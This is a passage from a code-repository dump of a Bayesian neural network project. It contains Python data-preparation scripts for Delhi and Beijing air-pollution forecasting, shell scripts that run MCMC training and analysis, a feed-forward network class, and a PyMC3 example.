"text": "import numpy as np\nimport pandas as pd\n\nimport sys\nsys.path.append('../../../Dataset_Transformers')\n\nfrom transform import DatasetGenerator as dg\nfrom transform import Normalizer as nzr\n\ndf = pd.read_csv('delhi_pm10_all_stations_wide.csv')\n\nindex_column = \"No\"\nforecast_column = \"STN_144_PM10\"\nforecast_period = 7\nlist_of_lags = [7,14,21]\n\n# NEED TO ADD THE INDEX COLUMN\n\ndf[index_column] = range( 0, len(df) )\n\nnew_df = dg.generate_time_dependent_features( df, index_column, forecast_column, forecast_period, list_of_lags)\n\ncut_off_date = '2015-01-01'\ntrain_df = new_df[ new_df['Date']<cut_off_date ]\ntest_df = new_df[ new_df['Date']>=cut_off_date ]\n\n# ###########################################################################################################\n# WRITE OUT THE FULL UN-NORMALISED VERSION\n# ###########################################################################################################\ntrain_df.to_csv('Station_144_Train.csv', encoding='utf-8', index=False, header=True)\ntest_df.to_csv('Station_144_Test.csv', encoding='utf-8', index=False, header=True)\n\n# ###########################################################################################################\n# REMOVE UNWANTED COLUMNS, NORMALISE AND WRITE TO DISK\n# -- WE REMOVE THE DIFF VERSION OF THE TARGET \n# AS IN THIS PROBLEM DATA IS GENERALLY STATIONARY (IT DOES NOT EXHIBIT OVERALL TREND)\n# ###########################################################################################################\nfeatures = train_df.columns.tolist()\nunwanted = ['No', 'Date', 'TARGET_STN_144_PM10_7_DIFF']\n\nfor x in unwanted : \n features.remove(x)\n\ntrain_df2 = train_df.loc[:,features]\ntest_df2 = test_df.loc[:,features]\n\ntarget_col = \"TARGET_STN_144_PM10_7_VALUE\"\n\nconfig = nzr.create_normalization_config(train_df2)\n\nnzr.write_field_config(config, target_col, 'Delhi_Station_144__other_stns_nzr_config.yaml')\n\ntrain_df_norm = nzr.normalize(train_df2, config, [])\ntest_df_norm = nzr.normalize(test_df2, config, [])\n\ntrain_df_norm.to_csv('Station_144_others_Train_normalised.csv', sep=' ', encoding='utf-8', index=False, header=False)\ntest_df_norm.to_csv('Station_144_others_Test_normalised.csv', sep=' ', encoding='utf-8', index=False, header=False)\n\n\n\n"
},
{
"alpha_fraction": 0.4740997552871704,
"alphanum_fraction": 0.5064510107040405,
"avg_line_length": 42.621849060058594,
"blob_id": "2094037ae208e625a2240b68de06aa759ec89f1a",
"content_id": "179d0a22869954ebb1cb1a930fb24f7bd0de9f89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5193,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 119,
"path": "/data/Beijing/process_168_hour.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\n\nimport sys\nsys.path.append('../../../Dataset_Transformers')\n\nfrom transform import DatasetGenerator as dg\nfrom transform import Normalizer as nzr\n\ndf = pd.read_csv('data.csv')\ndf2 = df[24:].copy()\ndf2['N'] = np.where(df2.cbwd.str[0:1]=='N', 1, 0)\ndf2['S'] = np.where(df2.cbwd.str[0:1]=='S', 1, 0)\ndf2['E'] = np.where(df2.cbwd.str[1:2]=='E', 1, 0)\ndf2['W'] = np.where(df2.cbwd.str[1:2]=='W', 1, 0)\ndf2.drop([\"cbwd\"],axis = 1, inplace = True) \n# WHERE PM2.5 IS ZERO - POTENTIAL MEASUREMENT LIMIT ERROR - REPLACE WITH NOMINAL SMALL VALUE\ndefault_value = 0.01\ndf2[\"pm2.5\"] = np.where(df2[\"pm2.5\"] == 0, default_value,df2[\"pm2.5\"] )\n\nindex_column = \"No\"\nforecast_column = \"pm2.5\"\nforecast_period = 168\nlist_of_lags = [1,2,24,48]\n\nnew_df = dg.generate_time_dependent_features( df2, index_column, forecast_column, forecast_period, list_of_lags )\n\ntrainset = 30000\ntrain_df = new_df.loc[0:trainset,:]\ntest_df = new_df.loc[trainset+1:,:]\n\n# ###########################################################################################################\n# WRITE OUT THE FULL UN-NORMALISED VERSION WITH ALL TARGETS AND HEADERS\n# ###########################################################################################################\ntrain_df.to_csv('sets/Train_168_hour_full.csv', sep=',', encoding='utf-8', index=False, header=True)\ntest_df.to_csv('sets/Test_168_hour_full.csv', sep=',', encoding='utf-8', index=False, header=True)\n\n\n# ###########################################################################################################\n# CREATE A NORMALISATION CONFIGURATION TO \n# ###########################################################################################################\n\nfeatures = train_df.columns.tolist()\nunwanted = [\"No\", \"year\", \"month\", \"day\"]\nfor x in unwanted :\n features.remove(x)\n\ntrain_df2 = train_df.loc[:,features]\ntest_df2 = test_df.loc[:,features]\nconfig = nzr.create_padded_normalization_config(train_df2, 0.05)\n\n\n# ###########################################################################################################\n#\n# GENERATE 3 DIFFERENT TRAINING AND TESTING SETS\n#\n# ###########################################################################################################\n\n# ###########################################################################################################\n# RAW TARGET NORMALISED \n# ###########################################################################################################\nfeatures = train_df.columns.tolist()\nunwanted = [\"No\", \"year\", \"month\", \"day\", \"TARGET_pm2.5_168_DIFF\", \"TARGET_pm2.5_168_PROP_DIFF\"]\nfor x in unwanted : \n features.remove(x)\n\ntrain_df2 = train_df.loc[:,features]\ntest_df2 = test_df.loc[:,features]\n\ntarget_col = \"TARGET_pm2.5_168_VALUE\"\nnzr.write_field_config(config, target_col, 'sets/Target_168_nzr_config.yaml')\n\ntrain_df_norm = nzr.normalize(train_df2, config, ['N','S','E','W'])\ntest_df_norm = nzr.normalize(test_df2, config, ['N','S','E','W'])\n\ntrain_df_norm.to_csv('sets/Train_168_hour_norm.csv', sep=' ', encoding='utf-8', index=False, header=False)\ntest_df_norm.to_csv('sets/Test_168_hour_norm.csv', sep=' ', encoding='utf-8', index=False, header=False)\n\n\n# ###########################################################################################################\n# DIFFERENCED VERSION \n# 
###########################################################################################################\nfeatures = train_df.columns.tolist()\nunwanted = [\"No\", \"year\", \"month\", \"day\", 'TARGET_pm2.5_168_VALUE', \"TARGET_pm2.5_168_PROP_DIFF\" ]\nfor x in unwanted : \n features.remove(x)\n\ntrain_df2 = train_df.loc[:,features]\ntest_df2 = test_df.loc[:,features]\n\ntarget_col = \"TARGET_pm2.5_168_DIFF\"\nnzr.write_field_config(config, target_col, 'sets/Target_168_nzr_config_diff.yaml')\n\ntrain_df_norm = nzr.normalize(train_df2, config, ['N','S','E','W'])\ntest_df_norm = nzr.normalize(test_df2, config, ['N','S','E','W'])\n\ntrain_df_norm.to_csv('sets/Train_168_hour_diff.csv', sep=' ', encoding='utf-8', index=False, header=False)\ntest_df_norm.to_csv('sets/Test_168_hour_diff.csv', sep=' ', encoding='utf-8', index=False, header=False)\n\n\n# ###########################################################################################################\n# PROPORTIONAL DIFFERENCED VERSION \n# ###########################################################################################################\nfeatures = train_df.columns.tolist()\nunwanted = [\"No\", \"year\", \"month\", \"day\", 'TARGET_pm2.5_168_VALUE', \"TARGET_pm2.5_168_DIFF\" ]\nfor x in unwanted :\n features.remove(x)\n\ntrain_df2 = train_df.loc[:,features]\ntest_df2 = test_df.loc[:,features]\n\ntarget_col = \"TARGET_pm2.5_168_PROP_DIFF\"\nnzr.write_field_config(config, target_col, 'sets/Target_168_nzr_config_prop_diff.yaml')\n\ntrain_df_norm = nzr.normalize(train_df2, config, ['N','S','E','W'])\ntest_df_norm = nzr.normalize(test_df2, config, ['N','S','E','W'])\n\ntrain_df_norm.to_csv('sets/Train_168_hour_prop_diff.csv', sep=' ', encoding='utf-8', index=False, header=False)\ntest_df_norm.to_csv('sets/Test_168_hour_prop_diff.csv', sep=' ', encoding='utf-8', index=False, header=False)\n\n\n"
},
{
"alpha_fraction": 0.6541143655776978,
"alphanum_fraction": 0.7573221921920776,
"avg_line_length": 64.1212158203125,
"blob_id": "4d83d3973c26d42285c3cb6ba42a8d851181e3e7",
"content_id": "e0e8b2242634a1842818518ad669e8f6a5335c14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2151,
"license_type": "no_license",
"max_line_length": 288,
"num_lines": 33,
"path": "/experiments/RUN_Delhi_SLP.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ncd ../\n\n# STATION 144\n# Delhi Air Quality \n \npython3 ./train_bn_mcmc.py 20 0 1 0 SLP sigmoid data/Delhi/STN_144/train_normalised.csv data/Delhi/STN_144/test_normalised.csv results/Delhi_144_SLP_Sigmoid/ MASE 100000\n\npython3 ./transform_test_results.py \"./results/Delhi_144_SLP_Sigmoid/test_predictions_final.tsv\" \"./results/Delhi_144_SLP_Sigmoid/test_predictions.tsv\" \"./data/Delhi/STN_144/test.csv\" \"data/Delhi/STN_144/nzr_config.yaml\" True False False False \"TARGET_STN_144_PM10_7_VALUE\" \"STN_144_PM10\"\n\npython3 analyse_test_results.py \"./results/Delhi_144_SLP_Sigmoid\" \"./results/Delhi_144_SLP_Sigmoid/test_predictions_final.tsv\" \"./data/Delhi/STN_144/test.csv\" 50000 \"TARGET_STN_144_PM10_7_VALUE\" \"STN_144_PM10\"\n\n\n# STATION 146\n# Delhi Air Quality\n\npython3 ./train_bn_mcmc.py 20 0 1 0 SLP sigmoid data/Delhi/STN_146/train_normalised.csv data/Delhi/STN_146/test_normalised.csv results/Delhi_146_SLP_Sigmoid/ MASE 100000\n\npython3 ./transform_test_results.py \"./results/Delhi_146_SLP_Sigmoid/test_predictions_final.tsv\" \"./results/Delhi_146_SLP_Sigmoid/test_predictions.tsv\" \"./data/Delhi/STN_146/test.csv\" \"data/Delhi/STN_146/nzr_config.yaml\" True False False False \"TARGET_STN_146_PM10_7_VALUE\" \"STN_146_PM10\"\n\npython3 analyse_test_results.py \"./results/Delhi_146_SLP_Sigmoid\" \"./results/Delhi_146_SLP_Sigmoid/test_predictions_final.tsv\" \"./data/Delhi/STN_146/test.csv\" 50000 \"TARGET_STN_146_PM10_7_VALUE\" \"STN_146_PM10\"\n\n\n\n# STATION 345\n# Delhi Air Quality\n\npython3 ./train_bn_mcmc.py 20 0 1 0 SLP sigmoid data/Delhi/STN_345/train_normalised.csv data/Delhi/STN_345/test_normalised.csv results/Delhi_345_SLP_Sigmoid/ MASE 100000\n\npython3 ./transform_test_results.py \"./results/Delhi_345_SLP_Sigmoid/test_predictions_final.tsv\" \"./results/Delhi_345_SLP_Sigmoid/test_predictions.tsv\" \"./data/Delhi/STN_345/test.csv\" \"data/Delhi/STN_345/nzr_config.yaml\" True False False False \"TARGET_STN_345_PM10_7_VALUE\" \"STN_345_PM10\"\n\npython3 analyse_test_results.py \"./results/Delhi_345_SLP_Sigmoid\" \"./results/Delhi_345_SLP_Sigmoid/test_predictions_final.tsv\" \"./data/Delhi/STN_345/test.csv\" 50000 \"TARGET_STN_345_PM10_7_VALUE\" \"STN_345_PM10\"\n\n\n"
},
{
"alpha_fraction": 0.7052631378173828,
"alphanum_fraction": 0.7157894968986511,
"avg_line_length": 22,
"blob_id": "00b25e2dc1dcefd2eb09433398f61d7be5917a14",
"content_id": "ed010f982c8f9ca0debad69a107db08142136b74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 95,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 4,
"path": "/analysis/RUN.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n\npython3 summarise_data.py ../data/Beijing/data.csv > Beijing_data_summary.tex\n\n\n\n"
},
{
"alpha_fraction": 0.6867470145225525,
"alphanum_fraction": 0.759036123752594,
"avg_line_length": 25.66666603088379,
"blob_id": "1d4421d4bd70c1d6791caa4f3b746aa88c6e54a5",
"content_id": "a056847344273fb353514d77af5df891393c6b6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 83,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 3,
"path": "/data/Beijing/process.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "\npython process_1_hour.py \npython process_24_hour.py \npython process_168_hour.py \n\n"
},
{
"alpha_fraction": 0.6911764740943909,
"alphanum_fraction": 0.6911764740943909,
"avg_line_length": 12.199999809265137,
"blob_id": "ee8c60fe43f6a98dc77952b94e7d94ed79e199b3",
"content_id": "0ded05f28150d3e22194f62abe54751385fc726f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 68,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 5,
"path": "/RUN_TESTS.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n./TEST_TRANSFORM_SCRIPT.sh\n\n./TEST_ANALYSE_SCRIPT.sh\n\n\n"
},
{
"alpha_fraction": 0.4470662474632263,
"alphanum_fraction": 0.45463722944259644,
"avg_line_length": 41.8270263671875,
"blob_id": "277734e9cd9cb7c3ca003db013a46042bafe576b",
"content_id": "ad53911f17c4a1dc44d4ddb3871699ae553a06fe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7925,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 185,
"path": "/src/FFNN.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport random\nimport time\nimport math\nfrom NeuralNetwork import NeuralNetwork\n\n#-------------------------------------------------------------------------------\n# A STANDARD FEED FORWARD NEURAL NETWORK CLASS\n# WITH THE METHODS THAT MAKE IT AMENABLE TO BAYESIAN ML PROCESSES\n#-------------------------------------------------------------------------------\nclass FFNN(NeuralNetwork):\n\n def __init__(self, input, hidden, output, output_act, eval_metric):\n\n self.hidden = hidden\n NeuralNetwork.__init__(self, input, output, output_act, eval_metric) \n\n self.w_size = self.get_weight_vector_length()\n\n self.initialise_cache()\n\n self.W1 = np.random.randn(self.input, self.hidden) / np.sqrt(self.input)\n self.B1 = np.random.randn(1, self.hidden) / np.sqrt(self.hidden) # bias first layer\n self.W2 = np.random.randn(self.hidden, self.output) / np.sqrt(self.hidden)\n self.B2 = np.random.randn(1, self.output) / np.sqrt(self.hidden) # bias second layer\n\n self.hidout = np.zeros((1, self.hidden)) # output of first hidden layer\n self.out = np.zeros((1, self.output)) # output layer for base model\n\n self.final_out = np.zeros((1, self.output)) # Final output for the model\n\n ######################################################################\n # PRINT THE ARCHITECTURE\n ######################################################################\n def print(self):\n print(\"Bayesian FEED FORWARD Neural Network\")\n print(\"Input Nodes:\", self.input)\n print(\"Hidden Nodes:\", self.hidden)\n print(\"Output Nodes:\", self.output)\n\n\n ######################################################################\n # PASS DATA X THROUGH THE NETWORK TO PRODUCE AN OUTPUT\n ######################################################################\n def forward_pass(self, X):\n z1 = X.dot(self.W1) - self.B1\n self.hidout = self.relu(z1) # output of first hidden layer\n z2 = self.hidout.dot(self.W2) - self.B2\n self.out = self.activation(z2)\n self.final_out = self.out\n return self.final_out\n\n\n ######################################################################\n # TAKE A SINGLE VECTOR OF FLOATING POINT NUMBERS AND USE IT TO \n # SET THE VALUES OF ALL WEIGHTS AND BIASES\n ######################################################################\n def decode(self, w):\n input_layer_wts = self.input * self.hidden\n output_layer_wts = self.hidden * self.output\n\n start_index = 0\n w_layer1 = w[start_index:input_layer_wts]\n self.W1 = np.reshape(w_layer1, (self.input, self.hidden))\n start_index = start_index + input_layer_wts\n\n self.B1 = w[start_index:start_index + self.hidden]\n start_index = start_index + self.hidden\n\n w_layer2 = w[start_index: start_index + output_layer_wts]\n self.W2 = np.reshape(w_layer2, (self.hidden, self.output))\n start_index = start_index + output_layer_wts\n\n self.B2 = w[start_index:start_index + self.output]\n start_index = start_index + self.output\n\n ######################################################################\n # ENCODE THE WEIGHTS AND BIASES INTO A SINGLE VECTOR \n ######################################################################\n def encode(self):\n w1 = self.W1.ravel()\n w2 = self.W2.ravel()\n w = np.concatenate([w1, self.B1, w2, self.B2])\n return w\n\n ######################################################################\n # PROCESS DATA\n # RUN A NUMBER OF EXAMPLES THROUGH THE NETWORK AND RETURN PREDICTIONS\n ######################################################################\n def process_data(self, data): \n size = 
data.shape[0]\n Input = np.zeros((1, self.input)) # temp hold input\n Desired = np.zeros((1, self.output))\n fx = np.zeros(size)\n for pat in range(0, size):\n Input[:] = data[pat, 0:self.input]\n Desired[:] = data[pat, self.input:]\n self.forward_pass(Input)\n fx[pat] = self.final_out\n return fx\n\n\n ######################################################################\n # EVALUATE PROPOSAL \n # THIS METHOD NEEDS TO SET THE WEIGHT PARAMETERS\n # THEN PASS THE SET OF DATA THROUGH, COLLECTING THE OUTPUT FROM EACH\n # OF THE BOOSTED LAYERS, AND THE FINAL OUTPUT\n ######################################################################\n def evaluate_proposal(self, data, w):\n self.decode(w)\n fx = self.process_data(data)\n y = data[:, self.input]\n feats = data[:, :self.input]\n metric = self.eval(fx, y, feats)\n return [fx, metric]\n\n ######################################################################\n # LOG LIKELIHOOD\n # CALCULATED GIVEN \n # - A PROPOSED SET OF WEIGHTS\n # - A DATA SET \n # - AND THE PARAMETERS FOR THE ERROR DISTRIBUTION\n ######################################################################\n def log_likelihood(self, data, w, tausq):\n y = data[:, self.input]\n [fx, rmse] = self.evaluate_proposal(data, w)\n loss = -0.5 * np.log(2 * math.pi * tausq) - 0.5 * np.square(y - fx) / tausq\n return np.sum(loss)\n\n\n ######################################################################\n # LOG PRIOR\n ######################################################################\n def log_prior(self, w, tausq):\n h = self.hidden # number hidden neurons\n d = self.input # number input neurons\n part1 = -1 * ((d * h + h + 2) / 2) * np.log(self.sigma_squared)\n part2 = 1 / (2 * self.sigma_squared) * (sum(np.square(w)))\n logp = part1 - part2 - (1 + self.nu_1) * np.log(tausq) - (self.nu_2 / tausq)\n return logp\n\n\n ######################################################################\n # GET THE COMPLETE LENGTH OF THE ENCODED WEIGHT VECTOR\n ######################################################################\n def get_weight_vector_length(self):\n start_index = 0\n input_layer_wts = self.input * self.hidden\n output_layer_wts = self.hidden * self.output\n boost_layer_wts = self.hidden * self.hidden\n start_index = start_index + input_layer_wts\n start_index = start_index + self.hidden\n start_index = start_index + output_layer_wts\n start_index = start_index + self.output\n return start_index\n\n\n ######################################################################\n # GET NEW PROPOSAL WEIGHT VECTOR BY MODIFYING AN EXISTING ONE\n ######################################################################\n def get_proposal_weight_vector(self, w):\n w_proposal = w + np.random.normal(0, self.step_w, self.w_size)\n return w_proposal\n\n ######################################################################\n # GET PROPOSAL TAU VALUE FOR ERROR DISTRIBUTION \n ######################################################################\n def get_proposal_tau(self, eta):\n eta_pro = eta + np.random.normal(0, self.step_eta, 1)\n tau_pro = math.exp(eta_pro)\n return [eta_pro, tau_pro]\n\n\n ######################################################################\n # ACCEPTANCE PROBABILITY - METROPOLIS HASTINGS\n ######################################################################\n def get_acceptance_probability(self, new_w, new_tausq, old_w, old_tausq, data ):\n return self.calculate_metropolis_hastings_acceptance_probability(new_w, new_tausq, old_w, old_tausq, data)\n\n 
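    # NOTE (editor): the flat vector produced by encode() and consumed by decode()
    # is laid out as [ W1 (input*hidden) | B1 (hidden) | W2 (hidden*output) | B2 (output) ],
    # which is the sum of block sizes returned by get_weight_vector_length();
    # the unused boost_layer_wts term there looks like a leftover from a boosted variant.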
######################################################################\n    # GET THE WEIGHT VECTOR\n    ######################################################################\n    def get_weight_vector(self):\n        mytemp = [self.get_weight_vector_length()]\n        return mytemp\n\n\n"
},
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.7668997645378113,
"avg_line_length": 76.90908813476562,
"blob_id": "f88a62d35c0e42f1328514b5ead1e213cceaf188",
"content_id": "88e91794c2e185f49dc8edd36e6a7a9c27d3c2b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 858,
"license_type": "no_license",
"max_line_length": 315,
"num_lines": 11,
"path": "/experiments/RUN_BeiJing_7day_FFNN_H15.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ncd ../\n\npython3 ./train_bn_mcmc.py 28 15 1 0 FFNN sigmoid data/Beijing/sets/Train_168_hour_norm.csv data/Beijing/sets/Test_168_hour_norm.csv results/Beijing_FFNN_H15_7day_Sigmoid/ MASE 100000\n\n# PROCESS THE RESULTS SO THAT THEY ARE IN THE TARGET SPACE (DEAL WITH NORMALISED OR DIFFERENCED TARGETS)\n\npython3 ./transform_test_results.py \"./results/Beijing_FFNN_H15_7day_Sigmoid/test_predictions_final.tsv\" \"./results/Beijing_FFNN_H15_7day_Sigmoid/test_predictions.tsv\" \"./data/Beijing/sets/Test_168_hour_full.csv\" \"data/Beijing/sets/Target_168_nzr_config.yaml\" True False False False \"TARGET_pm2.5_168_VALUE\" \"pm2.5\"\n\npython3 analyse_test_results.py \"./results/Beijing_FFNN_H15_7day_Sigmoid\" \"./results/Beijing_FFNN_H15_7day_Sigmoid/test_predictions_final.tsv\" \"./data/Beijing/sets/Test_168_hour_full.csv\" 50000 \"TARGET_pm2.5_168_VALUE\" \"pm2.5\"\n\n"
},
{
"alpha_fraction": 0.667560338973999,
"alphanum_fraction": 0.7667560577392578,
"avg_line_length": 64.79412078857422,
"blob_id": "5a2335403599de26a4576b744478a6f4d3fe048a",
"content_id": "53b93fabf35dd0c8b812ca4abee8ab589c487443",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2238,
"license_type": "no_license",
"max_line_length": 296,
"num_lines": 34,
"path": "/experiments/RUN_Delhi_LangevinFFNN.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n \ncd ../\n\n# Station 144\n# Delhi Air Quality\n\npython3 ./train_bn_mcmc.py 20 5 1 0 LangevinFFNN sigmoid data/Delhi/STN_144/train_normalised.csv data/Delhi/STN_144/test_normalised.csv results/Delhi_144_LvnFFNN_Sigmoid/ MASE 100000\n\npython3 ./transform_test_results.py \"./results/Delhi_144_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./results/Delhi_144_LvnFFNN_Sigmoid/test_predictions.tsv\" \"./data/Delhi/STN_144/test.csv\" \"data/Delhi/STN_144/nzr_config.yaml\" True False False False \"TARGET_STN_144_PM10_7_VALUE\" \"STN_144_PM10\"\n\npython3 analyse_test_results.py \"./results/Delhi_144_LvnFFNN_Sigmoid\" \"./results/Delhi_144_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./data/Delhi/STN_144/test.csv\" 50000 \"TARGET_STN_144_PM10_7_VALUE\" \"STN_144_PM10\"\n\n\n# Station 146\n# Delhi Air Quality\n\npython3 ./train_bn_mcmc.py 20 5 1 0 LangevinFFNN sigmoid data/Delhi/STN_146/train_normalised.csv data/Delhi/STN_146/test_normalised.csv results/Delhi_146_LvnFFNN_Sigmoid/ MASE 100000\n\npython3 ./transform_test_results.py \"./results/Delhi_146_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./results/Delhi_146_LvnFFNN_Sigmoid/test_predictions.tsv\" \"./data/Delhi/STN_146/test.csv\" \"data/Delhi/STN_146/nzr_config.yaml\" True False False False \"TARGET_STN_146_PM10_7_VALUE\" \"STN_146_PM10\"\n\npython3 analyse_test_results.py \"./results/Delhi_146_LvnFFNN_Sigmoid\" \"./results/Delhi_146_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./data/Delhi/STN_146/test.csv\" 50000 \"TARGET_STN_146_PM10_7_VALUE\" \"STN_146_PM10\"\n\n\n\n\n# Station 345\n# Delhi Air Quality\n\npython3 ./train_bn_mcmc.py 20 5 1 0 LangevinFFNN sigmoid data/Delhi/STN_345/train_normalised.csv data/Delhi/STN_345/test_normalised.csv results/Delhi_345_LvnFFNN_Sigmoid/ MASE 100000\n\npython3 ./transform_test_results.py \"./results/Delhi_345_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./results/Delhi_345_LvnFFNN_Sigmoid/test_predictions.tsv\" \"./data/Delhi/STN_345/test.csv\" \"data/Delhi/STN_345/nzr_config.yaml\" True False False False \"TARGET_STN_345_PM10_7_VALUE\" \"STN_345_PM10\"\n\npython3 analyse_test_results.py \"./results/Delhi_345_LvnFFNN_Sigmoid\" \"./results/Delhi_345_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./data/Delhi/STN_345/test.csv\" 50000 \"TARGET_STN_345_PM10_7_VALUE\" \"STN_345_PM10\"\n\n"
},
{
"alpha_fraction": 0.6286057829856873,
"alphanum_fraction": 0.6673678159713745,
"avg_line_length": 33.278350830078125,
"blob_id": "84dca0ecec3e752b3d4842235fd157a016f81a65",
"content_id": "46be21cd024322228f1d348aa6a0589e1472b680",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3328,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 97,
"path": "/src/Theano_Bayesian_NN.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import pymc3 as pm\nimport theano.tensor as T\nimport theano\nimport sklearn\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.preprocessing import scale\nfrom sklearn.cross_validation import train_test_split\n\nimport matplotlib.pyplot as plt\n\nX, Y = datasets.make_blobs(n_samples=200, n_features=2, centers=2, cluster_std=3.0, \n center_box=(-5.0, 5.0), shuffle=True, random_state=None)\n\nX = scale(X)\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=.5)\n\n\nplt.scatter(X[Y==0, 0], X[Y==0, 1])\nplt.scatter(X[Y==1, 0], X[Y==1, 1], color='r')\n\nplt.show()\n\n# Turn inputs and outputs into shared variables so that we can change them later\nann_input = theano.shared(X_train)\nann_output = theano.shared(Y_train)\n\nwith pm.Model() as model:\n # Below we require an ordering of the summed weights, thus initialize in this order\n init_1 = np.random.randn(X.shape[1], 3)\n init_1 = init_1[:, np.argsort(init_1.sum(axis=0))]\n init_2 = np.random.randn(3)\n init_2 = init_2[np.argsort(init_2)]\n # Weights from input to hidden layer\n weights_in_1 = pm.Normal('w_in_1', 0, sd=1, shape=(X.shape[1], 3), testval=init_1)\n # Weights from hidden layer to output\n weights_1_out = pm.Normal('w_1_out', 0, sd=1, shape=(3,), testval=init_2)\n # As the hidden neurons are interchangeable this induces a symmetry in the posterior.\n # This is my first attempt at breaking that symmetry. I'm not sure if it's actually\n # correct or if there is a better way to do it. It seems to work for this toy model.\n pm.Potential('order_means_potential',\n T.switch(T.ge(T.sum(weights_in_1[:, 0]), T.sum(weights_in_1[:, 1])), -np.inf, 0)\n + T.switch(T.ge(T.sum(weights_in_1[:, 1]), T.sum(weights_in_1[:, 2])), -np.inf, 0))\n # Not sure if this is required...\n pm.Potential('order_means_potential2',\n T.switch(T.ge(weights_1_out[0], weights_1_out[1]), -np.inf, 0)\n + T.switch(T.ge(weights_1_out[1], weights_1_out[2]), -np.inf, 0))\n # Do forward pass\n a1 = T.dot(ann_input, weights_in_1)\n act_1 = T.nnet.sigmoid(a1)\n act_out = T.dot(act_1, weights_1_out)\n out = pm.Bernoulli('out', T.nnet.sigmoid(act_out), observed=ann_output)\n step = pm.Metropolis()\n trace = pm.sample(50000, step=step)\n\npm.traceplot(trace)\n\n\n\n\n# Replace shared variables with testing set\n# (note that using this trick we could be streaming ADVI for big data)\nann_input.set_value(X_test)\nann_output.set_value(Y_test)\n\n# Creater posterior predictive samples\nppc = pm.sample_ppc(trace, model=model, samples=500)\npred = ppc['out'].mean(axis=0) > 0.5\n\n\n\nplt.scatter(X_test[pred==0, 0], X_test[pred==0, 1])\nplt.scatter(X_test[pred==1, 0], X_test[pred==1, 1], color='r')\nplt.title('Predicted labels in testing set')\n\n\n\nprint('Accuracy = {}%'.format((Y_test == pred).mean() * 100))\n\n\nimport seaborn as sns\nsns.regplot(ppc['out'].mean(axis=0), Y_test, logistic=True)\n\ngrid = np.mgrid[-3:3:100j,-3:3:100j]\ngrid_2d = grid.reshape(2, -1).T\ndummy_out = np.ones(grid.shape[1], dtype=np.int8)\n\nann_input.set_value(grid_2d)\nann_output.set_value(dummy_out)\n# Creater posterior predictive samples\nppc = pm.sample_ppc(trace, model=model, samples=500)\npred = ppc['out'].mean(axis=0)\n\nsns.heatmap(pred.reshape(100, 100).T)\n\n\nsns.heatmap(ppc['out'].std(axis=0).reshape(100, 100).T)\n\n\n\n"
},
{
"alpha_fraction": 0.6547868847846985,
"alphanum_fraction": 0.688329815864563,
"avg_line_length": 28.14285659790039,
"blob_id": "c9d07df6092f47c952b6f44cdaea2133c32c998e",
"content_id": "b53a62f662ae73554938b279d4b7db99c4586730",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1431,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 49,
"path": "/TEST_ANALYSE_SCRIPT.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
